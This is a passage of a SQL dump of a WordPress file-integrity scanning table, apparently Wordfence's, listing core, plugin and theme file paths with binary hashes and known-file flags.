O�FI�','wp-includes/wp-includes/css/wp-embed-template.min.css',0,'���n��t�{�hK�','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k������kg','�a�5,4��k@SJ�&/`�D~��%M�z�','',0,'?'),('Z9c�D/˰���}V\'','wp-includes/wp-includes/js/dist/edit-post.min.js',0,'/�):����sL?&��','/�):����sL?&��','�I��R=E\Z��`֚m٪�p\Zt~�#�`I��','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('Z:cX�L��j���Nc','wp-content/plugins/wordpress-seo/js/dist/languages/hu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zչ,魵�[�����','.aw/�Bߣl^\\�SFԦch��8���<�P�','',0,'?'),('Z>�n؏/q��Nb�','wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L��qy䦴|N�|�','\Z����Q>�zE���|&��gJ�-iV^����','',0,'?'),('ZA�P��z����','wp-includes/blocks/pullquote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�Z��B��;4ƍ��1','�\\mZ�\n{�q�:�-f��| ٦��HXH6/m�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZR����?���NfI��','wp-content/plugins/wp-smushit/core/modules/class-smush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�D~qe@��ȆZ�h','��6�x�I��Ҩ����HOd�78�l[|�','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Z]��\nF���J�~|.�','wp-content/plugins/wp-cerber/assets/flags/pt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c��L#���','Y4�7��bs\\7m�­y�f.�`�#����Z~��','',0,'?'),('Zu�;�Z��cd��XJ�','wp-content/plugins/redirection/fileio/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�B��j�{&PEl','7e����U��V�T&�/\'�8�ܫlӗ�v�ڛ','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�Y�_��r��X��',')��Nv���4b�xuj>I&�Xܸ�c!Kb','',0,'?'),('Z}My�R6��#�`v\Z�s','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0E�����\Z�K�ԏ~','GΪy*+���q��-������\'�m��7P','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z�\Z3%s�$QD%���','wp-content/plugins/wp-smushit/app/views/pro-features/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X����\"\Z�;4���]Ȩ','�tWW�ٝ1��$�j,z#B��d摎w��','',0,'?'),('Z��0s{�\0Gt��Z','wp-includes/blocks/categories/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��	�=�9!U��b','/��]�Ol��kڵ�/Ҡ�[q�>>�<x��l','',0,'?'),('Z�.zY#����O��`)�','wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iԛ{���9O_�t��','��ʘ���$�i%�P�l��,2Ni�\\e�','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����n��(F�̽�','e��>���WZ�]��m��l΁�j���ei','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z��9Sr�L�[XL�=c','wp-includes/wp-includes/session.php',0,'�NRM��<\\����>��','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UJ/�ƺAFKR\'J','��kW5�E%��>+�w�Z�S��i@S,�z�N#','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�����o �_��k�S','wp-content/themes/hitmag/inc/kirki/core/class-kirki-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Q��y�9��Xh4p�','�>s��F������xS�̱��s5A�pZ;','',0,'?'),('Z�YS,w�]�½�-f{�','wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�n�r�)^�ٔ�mO','?	6��.��C�9�V�o�85�//�?���x','',0,'?'),('Z�j�)KxB߿�l��g','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���.4wkE�ؗ�','���;����b�!�]޳g�KV�p��)F�2�_','',0,'?'),('Z�H7)z�u��Nx\"�','wp-content/plugins/wordpress-seo/src/config/migration-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��)��\rPN�f��','}�Mo�������<c.��襥`١�g2�bF0','',0,'?'),('Z�(�:a��	|�','wp-includes/wp-includes/js/thickbox/macFFBgHack.png',0,'�Ȱg�W�,/u�','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('Z�*Է�!�\"E\Z�@','wp-includes/blocks/pullquote/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�ڽ��u�g{�\Z','�SF�=���T�	��n	�M晷O&�Xpڔ','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�.�/���k�(�','�N\Z	��;���\rBR�x��%�%�CR�<','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('Z�כGN�ދ������','wp-content/themes/hitmag/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hq��A����i�','���	q68�xօ�\\��s\rN�~�.��Zخ[\"','',0,'?'),('Z�7�ؑ#)6��\Z�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fa.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��m3����~�?�','�yL�4�ȞnBeuҏ�݌�~PK������l:','',0,'?'),('Z��4Y+��96*�у','wp-includes/wp-includes/css/dist/block-library/style.css',0,'p>F��ő~���K��','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('[:u����;r\Z','wp-content/plugins/wp-cerber/assets/flags/ge.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u#���\n�W�T�x7','|$x�k�:KD������r�e�\r>Jhbt�','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Z�,�vkU�š','�?f��Ԍt��]������C2x�d�д','',0,'?'),('[\Z*:B��<u��}0','wp-includes/wp-includes/js/wp-emoji-loader.js',0,'�hn�1e��胖��S�','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('[(��L\'�|aC2�[','wp-content/plugins/wp-cerber/assets/flags/kz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vx�w�\'r���	�i�','�/��N/��\r&��(�����#���c�^a�1���','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[8�H����{��m<>�','wp-includes/wp-includes/js/tinymce/utils/mctabs.js',0,'끡�\"Y����>xU季','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('[9���5�r��Ot�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9~!��ץ�95��t�','�B?���i0��s��\r�+��T\Z����Q��l��e','',0,'?'),('[XiE���H�x�X��C','wp-content/plugins/wordpress-seo/src/deprecated/admin/links/class-link-table-accessible-notifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=���\r��L�','m_:���x̸hi2��3��m���B3�pv=��X','',0,'?'),('[n��0,n�|Jnw|/W ','wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js',0,'��ώ�@�/@M�m�N�','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('[~6��Mp�\'���q','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-wpseo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}PN�Q��*��Q��','�Z�X�B��C��t4D��?���)���ů.�','',0,'?'),('[�:�!U�C~\n�k��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v4�F�\nm��	�?','�cXI[\0���#J����^���ټT�`��Jt','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�P����t�;��','�n�ܿ��)�͜׮����r�C�i���%aC_','',0,'?'),('[����q`1�����x','wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�ҦV�7@\Zb�','M.\0�E����,��NK�#��_%E�x�h�','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[�Psr@ܟ��e�#9s\Z','wp-content/plugins/redirection/locale/redirection-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/bՕ-�/�\\?��','��\"_��Z\r��N�k񾵊�9��j�ȴR$P%i','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W,a4�Vk��6�6L','`�Q�V;�`��������_1p����R�F�;','',0,'?'),('[��A�0�b[�B�G','wp-content/plugins/wordfence/images/logos/shield-free.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m3k#�^��\Z\Z+W','�Lmd��1��a ףM�\\�m(#p��^1M��','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�r�Nf}�-��⽪','��H������i���c�!��I).eh������','',0,'?'),('[�BX\n��Q����c�','wp-includes/blocks/file/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|Um��^�Ģe��H}�','z�q��\Z�7\"%+�/,@O\0�	-�\ZM�H3�','',0,'?'),('[��ӽ�$�qj�g_5�','wp-includes/css/dist/block-library/editor-elements.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vHօ�<��Uj+�@T','����VLb����4d�op���w���X�K��','',0,'?'),('[�{Lzҍ7A��җt�','wp-content/plugins/wordpress-seo/packages/js/images/succes_marieke_bubble_optm.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n	ti����[D���','�E�Vhuv�a!�A�h�į��\rR�8*gu9$}','',0,'?'),('[�ئ�m��Np�h','wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�(��	�\'8�a�q','J4�,�z���eΉ ��_���l��R�c�Y�','',0,'?'),('[�f&`J����\\$k`','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies/category-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K9�hpo�(3�[','F�mK�y#���X�}`����r��g�_\r�@\\�','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('[�Մ)��ƚ2]���)E','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/InflateStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a<���q���vm�','�v��fX���?��ί[/QZ��~��Q\r��','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�3��sCƻy�6�_R','\0qҥ�i��/sc���m��������','',0,'?'),('\\e&$�1I�>��Q','wp-content/plugins/wordpress-seo/src/surfaces/twitter-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q��;O�L��Љr','h��2�S~�WK#�I~\nqST�E��4d�[\'Z0�.','',0,'?'),('\\�Ɋ6O+t��jR�{','wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w2+�6:+t�T���@','`w,�ݯc/���>B���i�_Kh�iM?�','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\L�}��Y�~�la��','wp-includes/blocks/gallery/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��yГ��L+��5�	','���z��W���&G��b���`xp�d��','',0,'?'),('\\R$��GO΄���y','wp-includes/css/dist/block-editor/default-editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���L�v�.�','Rgu`���„g���15�?PLR����*f0','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�╄)���y-?�','�&��P�\n�e5�o,V?�A\Z�U�;��9�;��z','',0,'?'),('\\e����i-��-�e','wp-content/plugins/redirection/redirection-strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�^�N���u�͵�4','����A����H���pOu҈����؊^1X','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1i�\Znqc�>��','(@�k�\r�\'�3b�spxu����ӂ�!��|','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oa[\'[csłU5�B ','��\"��q+/@׫n�[b�xhR�jV�g{�#�-','',0,'?'),('\\ڋp�����I�T�6�','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^���/ǁ��.��','������x�9-��uNn��L���>��诜1SE','',0,'?'),('\\ޭ��S��%fH~�.','wp-content/plugins/wp-cerber/assets/flags/sg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>t���5���','����_ rړ7�Q��u�M�G\"]N���Oc�l','',0,'?'),('\\�L����\rn�i��','wp-includes/blocks/template-part/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"/�h��O�k@ޤ','�%��X仍(��Kb�6q�F��*F30]����h','',0,'?'),('\\��Le���/�s�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/GenericResourceOwner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����>t�������\Z','<\rQ�QV;��|JR>R<P�?�������\\8�','',0,'?'),('\\�ՙxC6^� 8�~���','wp-content/plugins/wp-smushit/app/views/webp/webp-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bK�jP�ڹ��I:�P�','��48.�jx$l���Ř7g�6C�!�o�ku�','',0,'?'),(']�J*ƒX��RE�','wp-includes/block-supports/dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���\n��֢�V��','�E<���0���^��{v�K�4@3�C~�Z�S�','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�D��I��HPJ�@gW','�#B��4/d�ӂ�[Dΰ&��4H�Z�u9W','',0,'?'),(']*��9�����W�','wp-content/plugins/wordfence/modules/login-security/css/admin.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�:��W�ݱb','�`��ʂw��\'��J^�8V�h�o7�c�0','',0,'?'),(']1���ZCEg#!�<(','wp-includes/wp-includes/ms-default-filters.php',0,'l�����n����','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),(']<a��[4�r�g?�','wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��������U��','��V�\'�+�q�y=���*%�n�����ũ�;&�','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�5�Fŵd`��{b','�7�|�A��;�?K�;˜��#�l9�#:���.','',0,'?'),(']F^aT��g\rIa_��UA','wp-content/plugins/wordpress-seo/src/deprecated/admin/links/class-link-compatibility-notifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M.��Ts\r��A���','p��b�:���}�\nrW�(8A�+7�ܶ�Z���','',0,'?'),(']HsOQ]�a-���E��;','wp-content/plugins/wp-cerber/assets/flags/pa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J���Էe�m\n�','�7��+�/k����v�ё�E��6��Eң�','',0,'?'),(']I�?�q�	|��M׋','wp-content/plugins/wordpress-seo/src/config/migrations/20200616130143_ReplacePermalinkHashIndex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���-e���D�F�X','�1��꣚&�t�ݼP��elל�����^K�','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q0���b��lz���7�',';Y��R�/���(�v0v�saDy�����','',0,'?'),(']Q��\"n\"�Df�,','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lazy_load@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�2<�WA07Tb�<�','����^���;~-�*KӄU��Ͷ��G������','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�\0�J��~�|��a�','Q4��7��rm\Z�.�x���uONK�/ٯ�Y','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']����c1���O����','wp-content/plugins/wordpress-seo/wp-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2!��4�١i}���','�|D�O�/�+���:�B`]�����G:q��','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�W�a9�m�l�T1','��=ޑ�o��9�d��-X�Ϯ�h�8��>q�;','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@mrk[�l��R����� ','E4�}�X?7PE���w���b�-�M�*4�aS','',0,'?'),(']�~t��j�@���u��','wp-includes/wp-includes/images/media/interactive.png',0,'R׬˂���ôʼnh�H','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),(']�x	on����7��','wp-content/plugins/wp-cerber/assets/flags/be.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0F=�o�������','�f;����h�lQ\"{̅NbL����|.�Z�','',0,'?'),(']��5ҰW�� 󨵿','wp-includes/wp-includes/js/dist/vendor/react-dom.min.js',0,'�c�JeN���uL��','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),(']�4d�9���C�<s�3','wp-includes/blocks/video/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n\0�̛���(�\ZnxI','B���EP�c�/�d��&kR#��\"��','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^��=Cw4��w���J','wp-content/plugins/redirection/locale/json/redirection-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���`$C��3�z','��Ϭ/�5>&��V��t�l9+t����','',0,'?'),('^%�2QR��T�\'�d��','wp-content/plugins/wp-fastest-cache/inc/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Г;4y/h��b�','�)�m^���,w�5��\r��3�.��J�ҁ�A�','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^M*�#�×!�*?� ','wp-content/plugins/wp-cerber/assets/flags/vu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�\rp*<��P����','\rk����1����j$>���3g��D\0�-�BM','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^YSb\r�\\tu<�.�\r�','wp-content/plugins/wp-cerber/assets/flags/td.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n6��b�k����[N','�_�f��Uo��6���P�T�3��6⸰j�','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^ef�\'1�֋�M\n�;','wp-content/themes/hitmag/template-parts/menu-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=�L�=oX����l4','r����g1�(����\05���4`+C;��!�g','',0,'?'),('^tv�߲J����%','wp-content/plugins/wordpress-seo/src/conditionals/web-stories-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�)�tL�5=','��U}��o�+�SO�Y����:<�WQ2T�g\0H','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^���)C�`�4�z','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	*\'�\'F���','vRK��(\'�]�\"[)����H�	v	.,}�','',0,'?'),('^��q�n��k\\���[�~','wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|3.\'y̋��:�','����F�_o&c�\'�:M�ȹ�O�:P�ϥI','',0,'?'),('^�ZG:��}\"E��**$','wp-content/plugins/redirection/api/api-log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�T۫�ж�����','�F���<��`��D�����O��]��S��','',0,'?'),('^�Y�Kb��F2T��T-','wp-includes/blocks/avatar/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���(\Z���Iz�','e2�,�Ք��e��n�C��L�]���s��+��','',0,'?'),('^�5�O	Z}�ciV�j�Q','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/RequiredParameterTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�-�Pm9������P',')d�ѩ�dց/ɑ�l�%��\n\\�\\n����}��','',0,'?'),('^�+l=�Ubo�(j','wp-includes/wp-includes/js/wpdialog.min.js',0,'=nR�-��KP��=��<','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('^���c/�o\n\Z+','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/Exception/IdentityProviderException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F\Z��șˣ���Y�Tf','�\0�nA�@��@��x��G\Z��O�>8�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^��PA�聸G�o��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('^��	